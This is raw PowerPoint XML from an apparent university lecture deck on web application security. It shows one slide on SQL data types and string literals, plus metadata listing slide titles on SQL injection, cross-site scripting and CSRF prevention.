          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Char – fixed length Unicode field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Varchar – variable length non-Unicode field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String literals are surrounded with ‘ only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember this, we’ll need it later…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1726594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466</TotalTime>
  <Words>2538</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>336</Paragraphs>
  <Slides>49</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60" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Book Antiqua</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Tempus Sans ITC</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Apothecary</vt:lpstr>
      <vt:lpstr>Bitmap Image</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>More list of incidents</vt:lpstr>
      <vt:lpstr>A snapshot of web security attack types</vt:lpstr>
      <vt:lpstr>Web application code-level security vulnerability</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLI) vulnerabilities</vt:lpstr>
      <vt:lpstr>BRIEF sql OVERVIEW</vt:lpstr>
      <vt:lpstr>Data types</vt:lpstr>
      <vt:lpstr>SQL commands</vt:lpstr>
      <vt:lpstr>SQL select</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Legitimate access to an account</vt:lpstr>
      <vt:lpstr>Legitimate access to an account</vt:lpstr>
      <vt:lpstr>Access to an account through SQL Injection</vt:lpstr>
      <vt:lpstr>Access through an SQL Injection attack</vt:lpstr>
      <vt:lpstr>Example of JSP code with vulnerability</vt:lpstr>
      <vt:lpstr>More clearly…</vt:lpstr>
      <vt:lpstr>Would result in…</vt:lpstr>
      <vt:lpstr>But!</vt:lpstr>
      <vt:lpstr>We get</vt:lpstr>
      <vt:lpstr>We get</vt:lpstr>
      <vt:lpstr>SQL Comments</vt:lpstr>
      <vt:lpstr>SQL Comments</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection attack classification</vt:lpstr>
      <vt:lpstr>Challenges of SQLI attack detection approaches</vt:lpstr>
      <vt:lpstr>Test case generation: Attack signature</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) vulnerabilities</vt:lpstr>
      <vt:lpstr>Posting a benign comment</vt:lpstr>
      <vt:lpstr>Viewing a benign comment</vt:lpstr>
      <vt:lpstr>Posting a malicious comment</vt:lpstr>
      <vt:lpstr>Viewing a malicious comment</vt:lpstr>
      <vt:lpstr>Viewing a malicious comment</vt:lpstr>
      <vt:lpstr>Posting a malicious script to steal cookie</vt:lpstr>
      <vt:lpstr>XSS attack types</vt:lpstr>
      <vt:lpstr>XSS vulnerable code and fixing example: JSP</vt:lpstr>
      <vt:lpstr>XSS vulnerable code example: JSP</vt:lpstr>
      <vt:lpstr>A reflected XSS attack example</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>A CSRF attack example </vt:lpstr>
      <vt:lpstr>A CSRF attack example cont.</vt:lpstr>
      <vt:lpstr>A CSRF attack example</vt:lpstr>
      <vt:lpstr>A CSRF attack example</vt:lpstr>
      <vt:lpstr>Stored CSRF attack example</vt:lpstr>
      <vt:lpstr>CSRF Prevention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 ios</dc:title>
  <dc:creator>William Forsyth</dc:creator>
  <cp:lastModifiedBy>William Forsyth</cp:lastModifiedBy>
  <cp:revision>58</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-21T17:32:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-24T18:00:07Z</dcterms:modified>
</cp:coreProperties>
</file>